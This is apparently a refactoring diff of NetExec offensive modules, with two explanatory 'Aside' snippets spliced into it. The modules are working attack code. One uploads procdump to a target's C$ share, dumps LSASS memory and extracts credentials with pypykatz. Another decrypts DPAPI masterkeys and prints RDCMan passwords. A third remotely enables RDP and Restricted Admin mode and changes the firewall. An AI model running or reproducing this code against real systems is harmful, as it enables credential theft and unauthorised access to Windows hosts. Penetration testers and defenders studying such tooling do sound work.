+        """PORT    Port to check (defaults to 445)"""
         self.port = 445
         if "PORT" in module_options:
             self.port = int(module_options["PORT"])
@ -46,7 +41,7 @@ class NXCModule:
         # Connect and bind to MS-RPRN (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/848b8334-134a-4d02-aea4-03b673d6c515)
         stringbinding = r"ncacn_np:%s[\PIPE\spoolss]" % connection.host

-        context.log.info("Binding to %s" % (repr(stringbinding)))
+        context.log.info(f"Binding to {stringbinding!r}")

         rpctransport = transport.DCERPCTransportFactory(stringbinding)

@ -71,7 +66,7 @@ class NXCModule:
             # Bind to MSRPC MS-RPRN UUID: 12345678-1234-ABCD-EF00-0123456789AB
             dce.bind(rprn.MSRPC_UUID_RPRN)
         except Exception as e:
-            context.log.fail("Failed to bind: %s" % e)
+            context.log.fail(f"Failed to bind: {e}")
             sys.exit(1)

         flags = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER
@ -119,13 +114,9 @@ class DCERPCSessionError(DCERPCException):
         if key in system_errors.ERROR_MESSAGES:
             error_msg_short = system_errors.ERROR_MESSAGES[key][0]
             error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
-            return "RPRN SessionError: code: 0x%x - %s - %s" % (
-                self.error_code,
-                error_msg_short,
-                error_msg_verbose,
-            )
+            return f"RPRN SessionError: code: 0x{self.error_code:x} - {error_msg_short} - {error_msg_verbose}"
         else:
-            return "RPRN SessionError: unknown error code: 0x%x" % self.error_code
+            return f"RPRN SessionError: unknown error code: 0x{self.error_code:x}"


 ################################################################################
@ -191,26 +182,26 @@ class DRIVER_INFO_2_BLOB(Structure):
     def fromString(self, data, offset=0):
         Structure.fromString(self, data)

-        name = data[self["NameOffset"] + offset :].decode("utf-16-le")
+        name = data[self["NameOffset"] + offset:].decode("utf-16-le")
         name_len = name.find("\0")
         self["Name"] = checkNullString(name[:name_len])

-        self["ConfigFile"] = data[self["ConfigFileOffset"] + offset : self["DataFileOffset"] + offset].decode("utf-16-le")
-        self["DataFile"] = data[self["DataFileOffset"] + offset : self["DriverPathOffset"] + offset].decode("utf-16-le")
-        self["DriverPath"] = data[self["DriverPathOffset"] + offset : self["EnvironmentOffset"] + offset].decode("utf-16-le")
-        self["Environment"] = data[self["EnvironmentOffset"] + offset : self["NameOffset"] + offset].decode("utf-16-le")
+        self["ConfigFile"] = data[self["ConfigFileOffset"] + offset: self["DataFileOffset"] + offset].decode("utf-16-le")
+        self["DataFile"] = data[self["DataFileOffset"] + offset: self["DriverPathOffset"] + offset].decode("utf-16-le")
+        self["DriverPath"] = data[self["DriverPathOffset"] + offset: self["EnvironmentOffset"] + offset].decode("utf-16-le")
+        self["Environment"] = data[self["EnvironmentOffset"] + offset: self["NameOffset"] + offset].decode("utf-16-le")


 class DRIVER_INFO_2_ARRAY(Structure):
     def __init__(self, data=None, pcReturned=None):
         Structure.__init__(self, data=data)
-        self["drivers"] = list()
+        self["drivers"] = []
         remaining = data
         if data is not None:
             for _ in range(pcReturned):
                 attr = DRIVER_INFO_2_BLOB(remaining)
                 self["drivers"].append(attr)
-                remaining = remaining[len(attr) :]
+                remaining = remaining[len(attr):]


 class DRIVER_INFO_UNION(NDRUNION):
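Aside (a toy sketch, not MS-RPRN data): the offset-slicing pattern DRIVER_INFO_2_BLOB.fromString() uses above — fixed byte offsets into a buffer of UTF-16-LE strings — shown on two made-up driver file names.

data = "ntprint.inf\0UNIDRV.DLL\0".encode("utf-16-le")
config_file_offset, data_file_offset = 0, len("ntprint.inf\0") * 2  # 2 bytes per UTF-16 code unit

config_file = data[config_file_offset:data_file_offset].decode("utf-16-le")
data_file = data[data_file_offset:].decode("utf-16-le")
print(config_file.rstrip("\0"), data_file.rstrip("\0"))  # ntprint.inf UNIDRV.DLL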
@ -1,7 +1,4 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 # prdocdump module for nxc python3
-# author: github.com/mpgn
 # thanks to pixis (@HackAndDo) for making it pretty l33t :)
 # v0.4

@ -20,13 +17,12 @@ class NXCModule:
     multiple_hosts = True

     def options(self, context, module_options):
-        """
+        r"""
         TMP_DIR             Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
         PROCDUMP_PATH       Path where procdump.exe is on your system (default: /tmp/), if changed embeded version will not be used
         PROCDUMP_EXE_NAME   Name of the procdump executable (default: procdump.exe), if changed embeded version will not be used
         DIR_RESULT          Location where the dmp are stored (default: DIR_RESULT = PROCDUMP_PATH)
         """
         self.tmp_dir = "C:\\Windows\\Temp\\"
         self.share = "C$"
         self.tmp_share = self.tmp_dir.split(":")[1]
@ -53,25 +49,25 @@ class NXCModule:
             self.dir_result = module_options["DIR_RESULT"]

     def on_admin_login(self, context, connection):
-        if self.useembeded == True:
+        if self.useembeded is True:
             with open(self.procdump_path + self.procdump, "wb") as procdump:
                 procdump.write(self.procdump_embeded)

-        context.log.display("Copy {} to {}".format(self.procdump_path + self.procdump, self.tmp_dir))
+        context.log.display(f"Copy {self.procdump_path + self.procdump} to {self.tmp_dir}")
         with open(self.procdump_path + self.procdump, "rb") as procdump:
             try:
                 connection.conn.putFile(self.share, self.tmp_share + self.procdump, procdump.read)
-                context.log.success("Created file {} on the \\\\{}{}".format(self.procdump, self.share, self.tmp_share))
+                context.log.success(f"Created file {self.procdump} on the \\\\{self.share}{self.tmp_share}")
             except Exception as e:
                 context.log.fail(f"Error writing file to share {self.share}: {e}")

         # get pid lsass
         command = 'tasklist /v /fo csv | findstr /i "lsass"'
-        context.log.display("Getting lsass PID {}".format(command))
+        context.log.display(f"Getting lsass PID {command}")
         p = connection.execute(command, True)
         pid = p.split(",")[1][1:-1]
         command = self.tmp_dir + self.procdump + " -accepteula -ma " + pid + " " + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp"
-        context.log.display("Executing command {}".format(command))
+        context.log.display(f"Executing command {command}")
         p = connection.execute(command, True)
         context.log.debug(p)
         dump = False
@ -91,30 +87,29 @@ class NXCModule:
             context.log.display("Error getting the lsass.dmp file name")
             sys.exit(1)

-        context.log.display("Copy {} to host".format(machine_name))
+        context.log.display(f"Copy {machine_name} to host")

         with open(self.dir_result + machine_name, "wb+") as dump_file:
             try:
                 connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
-                context.log.success("Dumpfile of lsass.exe was transferred to {}".format(self.dir_result + machine_name))
+                context.log.success(f"Dumpfile of lsass.exe was transferred to {self.dir_result + machine_name}")
             except Exception as e:
-                context.log.fail("Error while get file: {}".format(e))
+                context.log.fail(f"Error while get file: {e}")

         try:
             connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
-            context.log.success("Deleted procdump file on the {} share".format(self.share))
+            context.log.success(f"Deleted procdump file on the {self.share} share")
         except Exception as e:
-            context.log.fail("Error deleting procdump file on share {}: {}".format(self.share, e))
+            context.log.fail(f"Error deleting procdump file on share {self.share}: {e}")

         try:
             connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
-            context.log.success("Deleted lsass.dmp file on the {} share".format(self.share))
+            context.log.success(f"Deleted lsass.dmp file on the {self.share} share")
         except Exception as e:
-            context.log.fail("Error deleting lsass.dmp file on share {}: {}".format(self.share, e))
+            context.log.fail(f"Error deleting lsass.dmp file on share {self.share}: {e}")

         with open(self.dir_result + machine_name, "rb") as dump:
             try:
-                credentials = []
                 credz_bh = []
                 try:
                     pypy_parse = pypykatz.parse_minidump_external(dump)
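Aside (sketch with a fabricated tasklist line): how the `pid = p.split(",")[1][1:-1]` expression in the hunk above pulls the PID out of `tasklist /v /fo csv | findstr /i "lsass"` output — the second CSV field, with its surrounding quotes stripped.

sample = '"lsass.exe","756","Services","0","18,124 K"'  # made-up output line
pid = sample.split(",")[1][1:-1]
print(pid)  # 756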
@ -23,7 +23,7 @@ class NXCModule:
         self.module_options = module_options

     def options(self, context, module_options):
-        """ """
+        """No options available."""

     def on_login(self, context, connection):
@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 from dploot.triage.rdg import RDGTriage
 from dploot.triage.masterkeys import MasterkeysTriage, parse_masterkey_file
 from dploot.triage.backupkey import BackupkeyTriage
@ -26,11 +23,11 @@ class NXCModule:
         self.masterkeys = None

         if "PVK" in module_options:
-            self.pvkbytes = open(module_options["PVK"], "rb").read()
+            self.pvkbytes = open(module_options["PVK"], "rb").read()  # noqa: SIM115

         if "MKFILE" in module_options:
             self.masterkeys = parse_masterkey_file(module_options["MKFILE"])
-            self.pvkbytes = open(module_options["MKFILE"], "rb").read()
+            self.pvkbytes = open(module_options["MKFILE"], "rb").read()  # noqa: SIM115

     def on_admin_login(self, context, connection):
         host = connection.hostname + "." + connection.domain
@ -67,8 +64,7 @@ class NXCModule:
                 backupkey = backupkey_triage.triage_backupkey()
                 self.pvkbytes = backupkey.backupkey_v2
             except Exception as e:
-                context.log.debug("Could not get domain backupkey: {}".format(e))
-                pass
+                context.log.debug(f"Could not get domain backupkey: {e}")

         target = Target.create(
             domain=domain,
@ -89,7 +85,7 @@ class NXCModule:
             conn = DPLootSMBConnection(target)
             conn.smb_session = connection.conn
         except Exception as e:
-            context.log.debug("Could not upgrade connection: {}".format(e))
+            context.log.debug(f"Could not upgrade connection: {e}")
             return

         plaintexts = {username: password for _, _, username, password, _, _ in context.db.get_credentials(cred_type="plaintext")}
@ -110,13 +106,13 @@ class NXCModule:
             )
             self.masterkeys = masterkeys_triage.triage_masterkeys()
         except Exception as e:
-            context.log.debug("Could not get masterkeys: {}".format(e))
+            context.log.debug(f"Could not get masterkeys: {e}")

         if len(self.masterkeys) == 0:
             context.log.fail("No masterkeys looted")
             return

-        context.log.success("Got {} decrypted masterkeys. Looting RDCMan secrets".format(highlight(len(self.masterkeys))))
+        context.log.success(f"Got {highlight(len(self.masterkeys))} decrypted masterkeys. Looting RDCMan secrets")

         try:
             triage = RDGTriage(target=target, conn=conn, masterkeys=self.masterkeys)
@ -125,71 +121,17 @@ class NXCModule:
                 if rdcman_file is None:
                     continue
                 for rdg_cred in rdcman_file.rdg_creds:
-                    if rdg_cred.type == "cred":
-                        context.log.highlight(
-                            "[%s][%s] %s:%s"
-                            % (
-                                rdcman_file.winuser,
-                                rdg_cred.profile_name,
-                                rdg_cred.username,
-                                rdg_cred.password.decode("latin-1"),
-                            )
-                        )
-                    elif rdg_cred.type == "logon":
-                        context.log.highlight(
-                            "[%s][%s] %s:%s"
-                            % (
-                                rdcman_file.winuser,
-                                rdg_cred.profile_name,
-                                rdg_cred.username,
-                                rdg_cred.password.decode("latin-1"),
-                            )
-                        )
-                    elif rdg_cred.type == "server":
-                        context.log.highlight(
-                            "[%s][%s] %s - %s:%s"
-                            % (
-                                rdcman_file.winuser,
-                                rdg_cred.profile_name,
-                                rdg_cred.server_name,
-                                rdg_cred.username,
-                                rdg_cred.password.decode("latin-1"),
-                            )
-                        )
+                    if rdg_cred.type in ["cred", "logon", "server"]:
+                        log_text = "{} - {}:{}".format(rdg_cred.server_name, rdg_cred.username, rdg_cred.password.decode("latin-1")) if rdg_cred.type == "server" else "{}:{}".format(rdg_cred.username, rdg_cred.password.decode("latin-1"))
+                        context.log.highlight(f"[{rdcman_file.winuser}][{rdg_cred.profile_name}] {log_text}")
             for rdgfile in rdgfiles:
                 if rdgfile is None:
                     continue
                 for rdg_cred in rdgfile.rdg_creds:
-                    if rdg_cred.type == "cred":
-                        context.log.highlight(
-                            "[%s][%s] %s:%s"
-                            % (
-                                rdgfile.winuser,
-                                rdg_cred.profile_name,
-                                rdg_cred.username,
-                                rdg_cred.password.decode("latin-1"),
-                            )
-                        )
-                    elif rdg_cred.type == "logon":
-                        context.log.highlight(
-                            "[%s][%s] %s:%s"
-                            % (
-                                rdgfile.winuser,
-                                rdg_cred.profile_name,
-                                rdg_cred.username,
-                                rdg_cred.password.decode("latin-1"),
-                            )
-                        )
-                    elif rdg_cred.type == "server":
-                        context.log.highlight(
-                            "[%s][%s] %s - %s:%s"
-                            % (
-                                rdgfile.winuser,
-                                rdg_cred.profile_name,
-                                rdg_cred.server_name,
-                                rdg_cred.username,
-                                rdg_cred.password.decode("latin-1"),
-                            )
-                        )
+                    log_text = "{}:{}".format(rdg_cred.username, rdg_cred.password.decode("latin-1"))
+                    if rdg_cred.type == "server":
+                        log_text = f"{rdg_cred.server_name} - {log_text}"
+                    context.log.highlight(f"[{rdgfile.winuser}][{rdg_cred.profile_name}] {log_text}")
         except Exception as e:
-            context.log.debug("Could not loot RDCMan secrets: {}".format(e))
+            context.log.debug(f"Could not loot RDCMan secrets: {e}")
@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 from sys import exit

 from nxc.connection import dcom_FirewallChecker
@ -11,12 +8,13 @@ from impacket.dcerpc.v5.dcomrt import DCOMConnection
 from impacket.dcerpc.v5.dcom import wmi
 from impacket.dcerpc.v5.dtypes import NULL
 from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
+import contextlib


 class NXCModule:
     name = "rdp"
     description = "Enables/Disables RDP"
-    supported_protocols = ["smb" ,"wmi"]
+    supported_protocols = ["smb", "wmi"]
     opsec_safe = True
     multiple_hosts = True

@ -35,7 +33,7 @@ class NXCModule:
        nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram}
        nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
         """
-        if not "ACTION" in module_options:
+        if "ACTION" not in module_options:
             context.log.fail("ACTION option not specified!")
             exit(1)

@ -44,26 +42,26 @@ class NXCModule:
             exit(1)

         self.action = module_options["ACTION"].lower()

-        if not "METHOD" in module_options:
+        if "METHOD" not in module_options:
             self.method = "wmi"
         else:
-            self.method = module_options['METHOD'].lower()
+            self.method = module_options["METHOD"].lower()

         if context.protocol != "smb" and self.method == "smb":
             context.log.fail(f"Protocol: {context.protocol} not support this method")
             exit(1)

-        if not "DCOM-TIMEOUT" in module_options:
+        if "DCOM-TIMEOUT" not in module_options:
             self.dcom_timeout = 10
         else:
             try:
-                self.dcom_timeout = int(module_options['DCOM-TIMEOUT'])
-            except:
+                self.dcom_timeout = int(module_options["DCOM-TIMEOUT"])
+            except Exception:
                 context.log.fail("Wrong DCOM timeout value!")
                 exit(1)

-        if not "OLD" in module_options:
+        if "OLD" not in module_options:
             self.oldSystem = False
         else:
             self.oldSystem = True
@ -73,136 +71,131 @@ class NXCModule:
         if self.method == "smb":
             context.log.info("Executing over SMB(ncacn_np)")
             try:
-                smb_rdp = rdp_SMB(context, connection)
+                smb_rdp = RdpSmb(context, connection)
                 if "ram" in self.action:
-                    smb_rdp.rdp_RAMWrapper(self.action)
+                    smb_rdp.rdp_ram_wrapper(self.action)
                 else:
-                    smb_rdp.rdp_Wrapper(self.action)
+                    smb_rdp.rdp_wrapper(self.action)
             except Exception as e:
-                context.log.fail(f"Enable RDP via smb error: {str(e)}")
+                context.log.fail(f"Enable RDP via smb error: {e!s}")
         elif self.method == "wmi":
             context.log.info("Executing over WMI(ncacn_ip_tcp)")

-            wmi_rdp = rdp_WMI(context, connection, self.dcom_timeout)
+            wmi_rdp = RdpWmi(context, connection, self.dcom_timeout)

-            if hasattr(wmi_rdp, '_rdp_WMI__iWbemLevel1Login'):
+            if hasattr(wmi_rdp, "_rdp_WMI__iWbemLevel1Login"):
                 if "ram" in self.action:
                     # Nt version under 6 not support RAM.
                     try:
-                        wmi_rdp.rdp_RAMWrapper(self.action)
+                        wmi_rdp.rdp_ram_wrapper(self.action)
                     except Exception as e:
                         if "WBEM_E_NOT_FOUND" in str(e):
                             context.log.fail("System version under NT6 not support restricted admin mode")
                         else:
                             context.log.fail(str(e))
-                        pass
                 else:
                     try:
-                        wmi_rdp.rdp_Wrapper(self.action, self.oldSystem)
+                        wmi_rdp.rdp_wrapper(self.action, self.oldSystem)
                     except Exception as e:
                         if "WBEM_E_INVALID_NAMESPACE" in str(e):
-                            context.log.fail('Looks like target system version is under NT6, please add "OLD=true" in module options.')
+                            context.log.fail("Looks like target system version is under NT6, please add 'OLD=true' in module options.")
                         else:
                             context.log.fail(str(e))
-                        pass
                 wmi_rdp._rdp_WMI__dcom.disconnect()

-class rdp_SMB:
+
+class RdpSmb:
     def __init__(self, context, connection):
         self.context = context
         self.__smbconnection = connection.conn
         self.__execute = connection.execute
         self.logger = context.log

-    def rdp_Wrapper(self, action):
-        remoteOps = RemoteOperations(self.__smbconnection, False)
-        remoteOps.enableRegistry()
+    def rdp_wrapper(self, action):
+        remote_ops = RemoteOperations(self.__smbconnection, False)
+        remote_ops.enableRegistry()

-        if remoteOps._RemoteOperations__rrp:
-            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
-            regHandle = ans["phKey"]
+        if remote_ops._RemoteOperations__rrp:
+            ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
+            reg_handle = ans["phKey"]

             ans = rrp.hBaseRegOpenKey(
-                remoteOps._RemoteOperations__rrp,
-                regHandle,
+                remote_ops._RemoteOperations__rrp,
+                reg_handle,
                 "SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
             )
-            keyHandle = ans["phkResult"]
+            key_handle = ans["phkResult"]

             ans = rrp.hBaseRegSetValue(
-                remoteOps._RemoteOperations__rrp,
-                keyHandle,
+                remote_ops._RemoteOperations__rrp,
+                key_handle,
                 "fDenyTSConnections",
                 rrp.REG_DWORD,
                 0 if action == "enable" else 1,
             )

-            rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections")
+            rtype, data = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, "fDenyTSConnections")

             if int(data) == 0:
                 self.logger.success("Enable RDP via SMB(ncacn_np) successfully")
             elif int(data) == 1:
                 self.logger.success("Disable RDP via SMB(ncacn_np) successfully")

-            self.firewall_CMD(action)
+            self.firewall_cmd(action)

             if action == "enable":
-                self.query_RDPPort(remoteOps, regHandle)
-        try:
-            remoteOps.finish()
-        except:
-            pass
+                self.query_rdp_port(remote_ops, reg_handle)
+        with contextlib.suppress(Exception):
+            remote_ops.finish()

-    def rdp_RAMWrapper(self, action):
-        remoteOps = RemoteOperations(self.__smbconnection, False)
-        remoteOps.enableRegistry()
+    def rdp_ram_wrapper(self, action):
+        remote_ops = RemoteOperations(self.__smbconnection, False)
+        remote_ops.enableRegistry()

-        if remoteOps._RemoteOperations__rrp:
-            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
-            regHandle = ans["phKey"]
+        if remote_ops._RemoteOperations__rrp:
+            ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
+            reg_handle = ans["phKey"]

             ans = rrp.hBaseRegOpenKey(
-                remoteOps._RemoteOperations__rrp,
-                regHandle,
+                remote_ops._RemoteOperations__rrp,
+                reg_handle,
                 "System\\CurrentControlSet\\Control\\Lsa",
             )
-            keyHandle = ans["phkResult"]
+            key_handle = ans["phkResult"]

             rrp.hBaseRegSetValue(
-                remoteOps._RemoteOperations__rrp,
-                keyHandle,
+                remote_ops._RemoteOperations__rrp,
+                key_handle,
                 "DisableRestrictedAdmin",
                 rrp.REG_DWORD,
                 0 if action == "enable-ram" else 1,
             )

-            rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "DisableRestrictedAdmin")
+            rtype, data = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, "DisableRestrictedAdmin")

             if int(data) == 0:
                 self.logger.success("Enable RDP Restricted Admin Mode via SMB(ncacn_np) succeed")
             elif int(data) == 1:
                 self.logger.success("Disable RDP Restricted Admin Mode via SMB(ncacn_np) succeed")

-        try:
-            remoteOps.finish()
-        except:
-            pass
+        with contextlib.suppress(Exception):
+            remote_ops.finish()

-    def query_RDPPort(self, remoteOps, regHandle):
+    def query_rdp_port(self, remoteOps, regHandle):
         if remoteOps:
             ans = rrp.hBaseRegOpenKey(
                 remoteOps._RemoteOperations__rrp,
                 regHandle,
                 "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",
             )
-            keyHandle = ans["phkResult"]
+            key_handle = ans["phkResult"]
|
||||||
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "PortNumber")
|
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, key_handle, "PortNumber")
|
||||||
|
|
||||||
self.logger.success(f"RDP Port: {str(data)}")
|
self.logger.success(f"RDP Port: {data!s}")
|
||||||
|
|
||||||
# https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/enable_rdp.rb
|
# https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/enable_rdp.rb
|
||||||
def firewall_CMD(self, action):
|
def firewall_cmd(self, action):
|
||||||
cmd = f"netsh firewall set service type = remotedesktop mode = {action}"
|
cmd = f"netsh firewall set service type = remotedesktop mode = {action}"
|
||||||
self.logger.info("Configure firewall via execute command.")
|
self.logger.info("Configure firewall via execute command.")
|
||||||
output = self.__execute(cmd, True)
|
output = self.__execute(cmd, True)
|
||||||
|
@ -211,20 +204,21 @@ class rdp_SMB:
|
||||||
else:
|
else:
|
||||||
self.logger.fail(f"{action.capitalize()} RDP firewall rules via cmd failed, maybe got detected by AV software.")
|
self.logger.fail(f"{action.capitalize()} RDP firewall rules via cmd failed, maybe got detected by AV software.")
|
||||||
|
|
||||||
class rdp_WMI:
|
|
||||||
|
class RdpWmi:
|
||||||
def __init__(self, context, connection, timeout):
|
def __init__(self, context, connection, timeout):
|
||||||
self.logger = context.log
|
self.logger = context.log
|
||||||
self.__currentprotocol = context.protocol
|
self.__currentprotocol = context.protocol
|
||||||
# From dfscoerce.py
|
# From dfscoerce.py
|
||||||
self.__username=connection.username
|
self.__username = connection.username
|
||||||
self.__password=connection.password
|
self.__password = connection.password
|
||||||
self.__domain=connection.domain
|
self.__domain = connection.domain
|
||||||
self.__lmhash=connection.lmhash
|
self.__lmhash = connection.lmhash
|
||||||
self.__nthash=connection.nthash
|
self.__nthash = connection.nthash
|
||||||
self.__target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
|
self.__target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
|
||||||
self.__doKerberos=connection.kerberos
|
self.__doKerberos = connection.kerberos
|
||||||
self.__kdcHost=connection.kdcHost
|
self.__kdcHost = connection.kdcHost
|
||||||
self.__aesKey=connection.aesKey
|
self.__aesKey = connection.aesKey
|
||||||
self.__timeout = timeout
|
self.__timeout = timeout
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -241,102 +235,102 @@ class rdp_WMI:
|
||||||
kdcHost=self.__kdcHost,
|
kdcHost=self.__kdcHost,
|
||||||
)
|
)
|
||||||
|
|
||||||
iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
|
i_interface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
|
||||||
if self.__currentprotocol == "smb":
|
if self.__currentprotocol == "smb":
|
||||||
flag, self.__stringBinding = dcom_FirewallChecker(iInterface, self.__timeout)
|
flag, self.__stringBinding = dcom_FirewallChecker(i_interface, self.__timeout)
|
||||||
if not flag or not self.__stringBinding:
|
if not flag or not self.__stringBinding:
|
||||||
error_msg = f'RDP-WMI: Dcom initialization failed on connection with stringbinding: "{self.__stringBinding}", please increase the timeout with the module option "DCOM-TIMEOUT=10". If it\'s still failing maybe something is blocking the RPC connection, please try to use "-o" with "METHOD=smb"'
|
error_msg = f'RDP-WMI: Dcom initialization failed on connection with stringbinding: "{self.__stringBinding}", please increase the timeout with the module option "DCOM-TIMEOUT=10". If it\'s still failing maybe something is blocking the RPC connection, please try to use "-o" with "METHOD=smb"'
|
||||||
|
|
||||||
if not self.__stringBinding:
|
if not self.__stringBinding:
|
||||||
error_msg = "RDP-WMI: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again"
|
error_msg = "RDP-WMI: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again"
|
||||||
|
|
||||||
self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)
|
self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)
|
||||||
# Make it force break function
|
# Make it force break function
|
||||||
self.__dcom.disconnect()
|
self.__dcom.disconnect()
|
||||||
self.__iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
|
self.__iWbemLevel1Login = wmi.IWbemLevel1Login(i_interface)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.fail(f'Unexpected wmi error: {str(e)}, please try to use "-o" with "METHOD=smb"')
|
self.logger.fail(f'Unexpected wmi error: {e}, please try to use "-o" with "METHOD=smb"')
|
||||||
if self.__iWbemLevel1Login in locals():
|
if self.__iWbemLevel1Login in locals():
|
||||||
self.__dcom.disconnect()
|
self.__dcom.disconnect()
|
||||||
|
|
||||||
def rdp_Wrapper(self, action, old=False):
|
def rdp_wrapper(self, action, old=False):
|
||||||
if old == False:
|
if old is False:
|
||||||
# According to this document: https://learn.microsoft.com/en-us/windows/win32/termserv/win32-tslogonsetting
|
# According to this document: https://learn.microsoft.com/en-us/windows/win32/termserv/win32-tslogonsetting
|
||||||
# Authentication level must set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY when accessing namespace "//./root/cimv2/TerminalServices"
|
# Authentication level must set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY when accessing namespace "//./root/cimv2/TerminalServices"
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2/TerminalServices", NULL, NULL)
|
||||||
iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
i_wbem_services.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
i_enum_wbem_class_object = i_wbem_services.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
||||||
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
|
i_wbem_class_object = i_enum_wbem_class_object.Next(0xFFFFFFFF, 1)[0]
|
||||||
if action == 'enable':
|
if action == "enable":
|
||||||
self.logger.info("Enabled RDP services and setting up firewall.")
|
self.logger.info("Enabled RDP services and setting up firewall.")
|
||||||
iWbemClassObject.SetAllowTSConnections(1,1)
|
i_wbem_class_object.SetAllowTSConnections(1, 1)
|
||||||
elif action == 'disable':
|
elif action == "disable":
|
||||||
self.logger.info("Disabled RDP services and setting up firewall.")
|
self.logger.info("Disabled RDP services and setting up firewall.")
|
||||||
iWbemClassObject.SetAllowTSConnections(0,0)
|
i_wbem_class_object.SetAllowTSConnections(0, 0)
|
||||||
else:
|
else:
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
i_enum_wbem_class_object = i_wbem_services.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
||||||
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
|
i_wbem_class_object = i_enum_wbem_class_object.Next(0xFFFFFFFF, 1)[0]
|
||||||
if action == 'enable':
|
if action == "enable":
|
||||||
self.logger.info("Enabling RDP services (old system not support setting up firewall)")
|
self.logger.info("Enabling RDP services (old system not support setting up firewall)")
|
||||||
iWbemClassObject.SetAllowTSConnections(1)
|
i_wbem_class_object.SetAllowTSConnections(1)
|
||||||
elif action == 'disable':
|
elif action == "disable":
|
||||||
self.logger.info("Disabling RDP services (old system not support setting up firewall)")
|
self.logger.info("Disabling RDP services (old system not support setting up firewall)")
|
||||||
iWbemClassObject.SetAllowTSConnections(0)
|
i_wbem_class_object.SetAllowTSConnections(0)
|
||||||
|
|
||||||
self.query_RDPResult(old)
|
|
||||||
|
|
||||||
if action == 'enable':
|
self.query_rdp_result(old)
|
||||||
self.query_RDPPort()
|
|
||||||
|
if action == "enable":
|
||||||
|
self.query_rdp_port()
|
||||||
# Need to create new iWbemServices interface in order to flush results
|
# Need to create new iWbemServices interface in order to flush results
|
||||||
|
|
||||||
def query_RDPResult(self, old=False):
|
def query_rdp_result(self, old=False):
|
||||||
if old == False:
|
if old is False:
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2/TerminalServices", NULL, NULL)
|
||||||
iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
i_wbem_services.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
